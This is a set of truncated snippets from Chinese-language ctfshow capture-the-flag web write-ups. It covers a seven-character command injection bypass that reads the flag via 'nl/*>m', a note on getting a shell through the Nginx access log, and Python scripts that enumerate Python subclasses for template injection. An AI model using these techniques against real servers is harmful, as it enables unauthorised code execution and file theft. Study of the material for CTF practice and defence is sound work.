会执行命令,但没有回显 同时js中限制了命令长度<=7 Copy functionisSafe(cmd) {returncmd.length<=7; } 直接用>(重定向符)到任意网址即可 Copy ls/>m 访问m可以下载结果 读flag,cat太长,用nl代替 payload Copy nl/*>m 访问m easy_calc# 给了源码 Copy <?phpif(check($code)){eval('$result='."...
ctfshow-web4(Nginx访问日志写shell) 这是一道有关Nginx日志文件写入shell的题目。 一、 基础知识 /etc/nginx/nginx.conf:该文件是Nginx的配置的文件,该文件保存着能够影响服务器运行的配置信息。有时会泄露敏感信息。该文件支持php解析。 /var/log/nginx/access.log:该文件是Nginx的访问日志文件,Nginx会把每个用户...
url="http://7c68b783-4649-47bf-9f21-8c48f80f3faa.chall.ctf.show/cccalccc"foriinrange(200):data={'q':"{str([].__class__.__base__.__subclasses__()["+str(i)+"])}"}res=requests.post(url=url,data=data).textif'warnings.catch_warnings'inres:print(i) 知道了模块的下标更方...
几次测试之后发现{payload}能够实现注入,但是发现结果为list或string类型的都Internal Server Error或结果为空,尝试将string切片显示,发现成功出现回显。编写jio本康康有什么可以利用的模块: 1importrequests23url='http://4cfb3ea5-9890-4c75-a6ef-9e64bfa8abc5.chall.ctf.show/cccalccc'4foriinrange(500):5...